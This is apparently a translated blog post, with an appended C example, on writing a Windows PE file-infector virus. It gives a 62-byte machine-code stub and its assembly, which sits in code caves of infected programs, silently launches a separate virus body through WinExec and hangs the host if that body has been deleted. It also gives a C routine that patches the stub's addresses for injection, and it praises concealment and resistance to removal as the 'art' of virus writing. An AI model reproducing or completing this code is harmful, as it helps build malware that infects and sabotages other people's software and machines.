About infectious viruses


Original post: http://blog.csdn.net/GaA_Ra/archive/2010/06/27/5697579.aspx

In my opinion, only infectious viruses really deserve the name "virus", because a file infector is hard to remove by hand. Back in college, the most annoying thing about cleaning other people's machines was running into an infector: unless you write a program to process the files automatically, manual cleanup is a lot of work. Of course, "real virus" here mostly reflects my view that a virus you can clear by hand is not a good virus. Virus writers chase propagation speed and neglect the virus's staying power. A Trojan that relies on a single startup registry key is far too easy to remove: you can delete the key in safe mode and even leave the virus body where it is.

With deeper study of the PE format and the maturing of high-level languages, writing file infectors is no longer something only assembly can do; it can be done in VC as well, at the cost of a compiled virus that is too large. With today's hardware nobody cares about 10-odd KB, but virus writing is an art, and the art lies in concealment. An injection of a mere hundred bytes embodies that art: it uses the gaps already present in the program (code caves) and does not change the program's length at all. Of course, the limit on code length inevitably reduces what the injected code can do. A week ago I wrote a prototype infector; writing it up here is a review.

 

Injection infection:

Because the host PE is not extended, the infection only injects the virus's startup code into the gaps the PE file already contains. This saves most of the space: the virus body itself lives in a separate file that the injected stub launches. If the virus body is removed, the stub demonstrates this by sabotaging the host program's execution.

 

unsigned char injectcode[] = {
    0x68, 0x44, 0x33, 0x22, 0x11, 0x33, 0xc0, 0x64,
    0xff, 0x30, 0x64, 0x89, 0x20, 0x50, 0x68, 0x44,
    0x33, 0x22, 0x11, 0xb8, 0x44, 0x33, 0x22, 0x11,
    0xff, 0xd0, 0x3c, 0x02, 0x74, 0x1e, 0x33, 0xc0,
    0x64, 0x8f, 0x00, 0x5a, 0x68, 0x44, 0x33, 0x22,
    0x11, 0xc3, 0x68, 0x44, 0x33, 0x22, 0x11, 0x8b,
    0x44, 0x24, 0x10, 0x8f, 0x80, 0xb8, 0x00, 0x00,
    0x00, 0x33, 0xc0, 0xc3, 0xeb, 0xfe
};
/***********************************************
injectcode[] =
_asm
{
    push 11223344h              ; install SEH: address of the handler below
    xor eax, eax
    push dword ptr fs:[eax]     ; save the previous handler
    mov dword ptr fs:[eax], esp
    push eax                    ; uCmdShow = 0 (SW_HIDE)
    push 11223344h              ; lpCmdLine: path of the virus body
    mov eax, 11223344h          ; address of WinExec
    call eax                    ; WinExec(lpCmdLine, SW_HIDE)
    cmp al, 2                   ; ERROR_FILE_NOT_FOUND: does the virus body still exist?
    je label                    ; no: enter the endless loop
    xor eax, eax                ; uninstall SEH
    pop dword ptr fs:[eax]
    pop edx                     ; discard the pushed handler address
    push 11223344h              ; host program's original OEP
    retn                        ; return execution to the host
                                ; SEH exception handler starts here
    push 11223344h              ; host OEP
    mov eax, dword ptr [esp+10h] ; ContextRecord (3rd argument, shifted by the push above)
    pop dword ptr [eax+0b8h]    ; CONTEXT.Eip = host OEP: resume at a safe address
    xor eax, eax                ; ExceptionContinueExecution
    retn
label:
    jmp label                   ; jmp $ (0xEB 0xFE)
}
************************************************/

The injection code is the machine code for the assembly in the _asm block in the comment above.

The injected code runs as follows: install SEH -> WinExec() -> check the return value -> if the launch failed because the virus body is gone (WinExec returned ERROR_FILE_NOT_FOUND, 2), enter the endless loop; otherwise uninstall SEH and return to the host's OEP. Note that the check compares only against 2: WinExec returns a value greater than 31 on success and a small error code otherwise, so other failures such as ERROR_PATH_NOT_FOUND (3) fall through to the host as if the launch had succeeded.

SEH is installed mainly to keep the host robust after infection, because the WinExec() address is hard-coded: on a different system it will not be valid and the call raises an exception. With the handler installed, the exception is caught and the handler redirects execution to the host's original code (it writes the host OEP into the Eip field of the CONTEXT record, offset 0B8h on x86, and returns ExceptionContinueExecution). 11223344h is a placeholder that must be replaced with the real address in each position. WinExec is used rather than CreateProcess because the latter takes far too many parameters; WinExec is essentially a wrapper around CreateProcess but takes only two arguments, saving more than 10 bytes. And because SEH is installed, an exception inside WinExec is nothing to fear. Two caveats the prototype does not address: from Windows Vista on, ASLR relocates kernel32 at every boot, so a hard-coded WinExec address fails on every start, and a host image built with SafeSEH rejects a handler that is not in its registered handler table, in which case the exception never reaches the stub's handler at all.

With the stub above in hand, infecting a file means collecting the necessary addresses (the stub's own location in the host, the address of the command-line string, the address of WinExec, and the host's original entry point) and completing the injection code by writing them over the placeholders before the stub is written into the file.
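As an added example that is not part of the original post, here is the fix-up step the paragraph above describes: a C routine that verifies the stub still has its five placeholder dwords at the expected offsets and patches in the four addresses (the handler address is derived from the stub's own location, since the handler lives inside the stub). The offset names, helper names and the addresses used in main are my own constructed values, not taken from any real system; the routine does no PE parsing and writes nothing to disk, because locating the code cave, the string and WinExec on the target is the part the post leaves for its continuation.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define STUB_LEN    62
#define PLACEHOLDER 0x11223344u

/* The 62-byte stub from the post (handler reads ContextRecord at [esp+10h]). */
static const unsigned char stub_template[STUB_LEN] = {
    0x68, 0x44, 0x33, 0x22, 0x11, 0x33, 0xc0, 0x64,
    0xff, 0x30, 0x64, 0x89, 0x20, 0x50, 0x68, 0x44,
    0x33, 0x22, 0x11, 0xb8, 0x44, 0x33, 0x22, 0x11,
    0xff, 0xd0, 0x3c, 0x02, 0x74, 0x1e, 0x33, 0xc0,
    0x64, 0x8f, 0x00, 0x5a, 0x68, 0x44, 0x33, 0x22,
    0x11, 0xc3, 0x68, 0x44, 0x33, 0x22, 0x11, 0x8b,
    0x44, 0x24, 0x10, 0x8f, 0x80, 0xb8, 0x00, 0x00,
    0x00, 0x33, 0xc0, 0xc3, 0xeb, 0xfe
};

/* Byte offsets (my own naming) of the placeholder dwords and of the handler's first byte. */
enum {
    OFF_PUSH_HANDLER = 1,   /* push <handler address>        (install SEH)      */
    OFF_CMDLINE      = 15,  /* push <lpCmdLine>              (WinExec argument) */
    OFF_WINEXEC      = 20,  /* mov eax, <WinExec address>                       */
    OFF_OEP_RET      = 37,  /* push <host OEP> ; retn        (normal path)      */
    OFF_HANDLER      = 42,  /* first instruction of the SEH handler             */
    OFF_OEP_HANDLER  = 43   /* the <host OEP> dword pushed by that instruction  */
};

static uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v);
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

/* Scan a stub for little-endian 0x11223344; store up to max offsets, return how many exist. */
size_t find_placeholders(const unsigned char *stub, size_t len, size_t *offs, size_t max)
{
    size_t n = 0, i;
    for (i = 0; i + 4 <= len; i++) {
        if (get_le32(stub + i) == PLACEHOLDER) {
            if (n < max) offs[n] = i;
            n++;
            i += 3;                         /* skip the rest of this dword */
        }
    }
    return n;
}

/* Fill every placeholder. stub_va: virtual address the stub will occupy in the host
 * (the code cave); cmdline_va: VA of the NUL-terminated path of the virus body;
 * winexec_va: address of kernel32!WinExec on the target; oep_va: the host's original
 * entry point (ImageBase + AddressOfEntryPoint).
 * Returns 0 on success, -1 if the template does not have the expected layout. */
int build_stub(unsigned char out[STUB_LEN], uint32_t stub_va, uint32_t cmdline_va,
               uint32_t winexec_va, uint32_t oep_va)
{
    static const size_t expected[5] = { OFF_PUSH_HANDLER, OFF_CMDLINE, OFF_WINEXEC,
                                        OFF_OEP_RET, OFF_OEP_HANDLER };
    size_t found[5];
    if (find_placeholders(stub_template, STUB_LEN, found, 5) != 5 ||
        memcmp(found, expected, sizeof found) != 0)
        return -1;
    memcpy(out, stub_template, STUB_LEN);
    put_le32(out + OFF_PUSH_HANDLER, stub_va + OFF_HANDLER); /* handler sits inside the stub */
    put_le32(out + OFF_CMDLINE,      cmdline_va);
    put_le32(out + OFF_WINEXEC,      winexec_va);
    put_le32(out + OFF_OEP_RET,      oep_va);
    put_le32(out + OFF_OEP_HANDLER,  oep_va);
    return 0;
}

int main(void)
{
    /* Constructed, hypothetical addresses; not measured on any real system. */
    unsigned char stub[STUB_LEN];
    size_t i;
    if (build_stub(stub, 0x00405000u, 0x00405040u, 0x7c800000u, 0x00401000u) != 0) {
        fprintf(stderr, "template layout mismatch\n");
        return 1;
    }
    for (i = 0; i < STUB_LEN; i++)
        printf("%02x%s", stub[i], (i % 16 == 15 || i + 1 == STUB_LEN) ? "\n" : " ");
    return 0;
}
```

The layout check before patching matters more than it looks: if the stub is ever edited (an extra instruction, a different jump), the placeholder offsets shift, and silently writing addresses at stale offsets produces a stub that crashes the host instead of launching anything.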

To be continued...
